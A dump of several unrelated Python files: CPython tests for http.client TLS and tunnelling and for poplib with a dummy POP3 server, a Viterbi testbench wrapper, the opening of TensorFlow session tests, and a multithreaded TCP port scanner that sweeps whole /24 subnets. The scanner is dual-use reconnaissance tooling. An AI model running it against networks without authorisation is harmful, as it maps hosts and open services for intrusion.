with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'key_file, cert_file and check_hostname are deprecated',
DeprecationWarning)
h = client.HTTPSConnection('localhost', 443, context=context,
cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
self.conn.sock = self.sock
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("body")
with open(os_helper.TESTFN, encoding="utf-8") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(os_helper.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_tunnel_connect_single_send_connection_setup(self):
"""Regresstion test for https://bugs.python.org/issue43332."""
with mock.patch.object(self.conn, 'send') as mock_send:
self.conn.set_tunnel('destination.com')
self.conn.connect()
self.conn.request('GET', '/')
mock_send.assert_called()
# Likely 2, but this test only cares about the first.
self.assertGreater(
len(mock_send.mock_calls), 1,
msg=f'unexpected number of send calls: {mock_send.mock_calls}')
proxy_setup_data_sent = mock_send.mock_calls[0][1][0]
self.assertIn(b'CONNECT destination.com', proxy_setup_data_sent)
self.assertTrue(
proxy_setup_data_sent.endswith(b'\r\n\r\n'),
msg=f'unexpected proxy data sent {proxy_setup_data_sent!r}')
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
portscan.py
|
#!/usr/local/opt/python/bin/python3.7
import socket
import threading
import argparse
import re
import os
import time
try:
from queue import Queue
except ImportError:
from Queue import Queue
import resource
# Expand thread number possible with extended FILE count.
# This remain as low as 2048 due to macOS secret open limit, unfortunately
resource.setrlimit(resource.RLIMIT_NOFILE, (2048, 2048))
# A multithreading portscan module
class PortScan:
# Regex Strings for parsing
SINGLE_IP = r'^(?:\d{1,3}\.){3}\d{1,3}$'
BLOCK_24 = r'^(?:\d{1,3}\.){3}0\/24$'
GROUPED_IP = r'^\[.*\]$'
def __init__(self, ip_str, port_str = None, thread_num = 500, show_refused=False, wait_time=3):
self.ip_range = self.read_ip(ip_str)
if port_str is None:
self.ports = [22, 23, 80]
else:
self.ports = self.read_port(port_str)
self.lock = threading.RLock()
self.thread_num = thread_num
if self.thread_num > 2047:
self.thread_num = 2047
self.q = Queue(maxsize=self.thread_num*5)
self.gen = None # Generator instance to be instantiated later
self.show_refused = show_refused
self.wait_time = wait_time
self.queue_status = False
# Read in IP Address from string.
def read_ip(self, ip_str):
# Single IP address
if re.match(PortScan.SINGLE_IP, ip_str):
if all([x<256 for x in map(int, ip_str.split('.'))]):
return [ip_str]
raise ValueError('incorrect IP Address')
# Block 24 IP address.
if re.match(PortScan.BLOCK_24, ip_str):
block_3 = list(map(int, ip_str.split('.')[:3]))
if all([x<256 for x in block_3]):
block_3s = '.'.join(map(str, block_3))
return [block_3s+'.'+str(i) for i in range(256)]
raise ValueError('incorrect IP Address')
# List of IP Address
if re.match(PortScan.GROUPED_IP, ip_str):
ip_str = ip_str[1:-1]
elements = [e.strip() for e in ip_str.split(',')]
master = []
for each in elements:
try:
sub_list = self.read_ip(each)
master.extend(sub_list)
except ValueError as e:
print("{} is not correctly formatted".format(each))
return master
raise ValueError('incorrect Match')
# Read in port range from string delimited by ','
def read_port(self, port_str):
ports = port_str.split(',')
port_list = []
for port in ports:
if re.match('^\d+$', port):
port_list.append(int(port))
elif re.match('^\d+-\d+$', port):
p_start = int(port.split('-')[0])
p_end = int(port.split('-')[1])
p_range = list(range(p_start, p_end+1))
port_list.extend(p_range)
else:
raise ValueError('incorrect Match')
return port_list
# Standalone thread for queue
def fill_queue(self):
while True:
if not self.q.full():
try:
self.q.put(next(self.gen))
except StopIteration:
# Break condition
self.queue_status = True
# print("STOPITERATION") # DEBUG: STOPITERATION should always appear.
break
else:
time.sleep(0.01)
return
def run(self):
# Generator that contains all ip:port pairs.
self.gen = ((ip, port) for ip in self.ip_range for port in self.ports)
queue_thread = threading.Thread(target=self.fill_queue)
queue_thread.daemon = True
queue_thread.start()
for i in range(self.thread_num):
t = threading.Thread(target=self.worker)
t.daemon = True
t.start()
if not self.queue_status:
# StopIteration has to be raised (generator completed)
# Before master thread finishes.
time.sleep(0.1)
self.q.join()
def worker(self):
# Worker threads that take ports from queue and consume it
while True: # never stop working!
work = self.q.get()
self.ping_port(*work)
self.q.task_done()
def ping_port(self, ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.wait_time)
status = sock.connect_ex((ip, port))
if status == 0:
with self.lock:
print('{}:{} OPEN'.format(ip, port))
elif status not in [35, 64, 65] and self.show_refused:
with self.lock:
print('{}:{} ERRNO {}, {}'.format(ip, port, status, os.strerror(status)))
return
def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
def main():
parser = argparse.ArgumentParser()
parser.add_argument('ip', nargs='?', default=None)
parser.add_argument('-p', '--port', action='store', dest='port')
parser.add_argument('-t', '--threadnum', action='store', dest='threadnum', default=500, type=int)
parser.add_argument('-e', '--show_refused', action='store_true', dest='show_refused', default=False)
parser.add_argument('-w', '--wait', action='store', dest='wait_time', default=5, type=float)
args = parser.parse_args()
if args.ip is None:
print("No IP string found, using local address")
ip = get_local_ip()
print("Local IP found to be {}, scanning entire block".format(ip))
ipblocks = ip.split('.')
ipblocks[-1] = '0/24'
ipfinal = '.'.join(ipblocks)
args.ip = ipfinal
scanner = PortScan(ip_str=args.ip, port_str=args.port,
thread_num=args.threadnum, show_refused=args.show_refused,
wait_time=args.wait_time)
scanner.run()
if __name__ == '__main__':
main()
|
viterbi_cxxrtl_tb.py
|
import subprocess
from threading import Thread
import numpy as np
def viterbi_cxxrtl_tb(coded_sequence, cxxrtl_tb_filename):
"""Python interface to cxxrtl executable
coded_sequence
Input data
cxxrtl_tb_filename
Executable name
"""
coded_string = "".join([chr(c + 97) for c in coded_sequence])
cxxrtl_bytes = bytearray(coded_string + ".", "ascii")
decoded = []
def decode_output(out, decoded):
for line in iter(out.readline, b""):
result = [1 if x == 49 else -1 for x in line if x == 48 or x == 49]
decoded.extend(result)
out.close()
# Call out to cxxrtl process
cxxrtl_exec = subprocess.Popen(
cxxrtl_tb_filename, stdout=subprocess.PIPE, stdin=subprocess.PIPE
)
# Thread to decode the output
t = Thread(target=decode_output, args=(cxxrtl_exec.stdout, decoded))
t.daemon = True # thread dies with the program
t.start()
# Chunked input
size = 2 ** 14
for pos in range(0, len(cxxrtl_bytes), size):
cxxrtl_exec.stdin.write(cxxrtl_bytes[pos : pos + size])
cxxrtl_exec.stdin.write(b"\n")
# Close stdin
try:
cxxrtl_exec.stdin.close()
except:
pass
# Wait for stdout to close
while not cxxrtl_exec.stdout.closed:
pass
cxxrtl_exec.wait()
return np.array(decoded)
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import time
import errno
from unittest import TestCase
from test import support as test_support
threading = test_support.import_module('threading')
HOST = test_support.HOST
PORT = 0
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' % (arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port, timeout=3)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_too_long_lines(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd,
'echo +%s' % ((poplib._MAXLINE + 10) * 'a'))
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
def test_apop(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert.pem")
class DummyPOP3_SSLHandler(DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
ssl_socket = ssl.wrap_socket(self.socket, certfile=CERTFILE,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(ssl_socket)
# Must try handshake before calling push()
self._ssl_accepting = True
self._do_ssl_handshake()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
DummyPOP3Handler.handle_read(self)
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = test_support.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def server(self, evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def testTimeoutNone(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(pop.sock.gettimeout() is None)
pop.sock.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=30)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def test_main():
tests = [TestPOP3Class, TestTimeouts]
if SUPPORTS_SSL:
tests.append(TestPOP3_SSLClass)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import random
import os
import sys
import threading
import time
import warnings
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as framework_device_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
# Import gradients to resolve circular imports
from tensorflow.python.ops import gradients # pylint: disable=unused-import
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
class SessionTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SessionTest, self).setUp()
warnings.simplefilter('always')
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(
np.asarray(
[[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32),
copy_val)
def testManyCPUs(self):
with session.Session(
config=config_pb2.ConfigProto(device_count={
'CPU': 2, 'GPU': 0
})) as sess:
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp, 10.0)
num_cpu_devices = 0
num_gpu_devices = 0
for device in sess.list_devices():
device_type = framework_device_lib.DeviceSpec.from_string(
device.name).device_type
if device_type == 'CPU':
num_cpu_devices += 1
elif device_type == 'GPU':
num_gpu_devices += 1
self.assertEqual(2, num_cpu_devices)
self.assertEqual(0, num_gpu_devices)
def testPerSessionThreads(self):
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp, 10.0)
def testSessionInterOpThreadPool(self):
config_pb = config_pb2.ConfigProto()
pool = config_pb.session_inter_op_thread_pool.add()
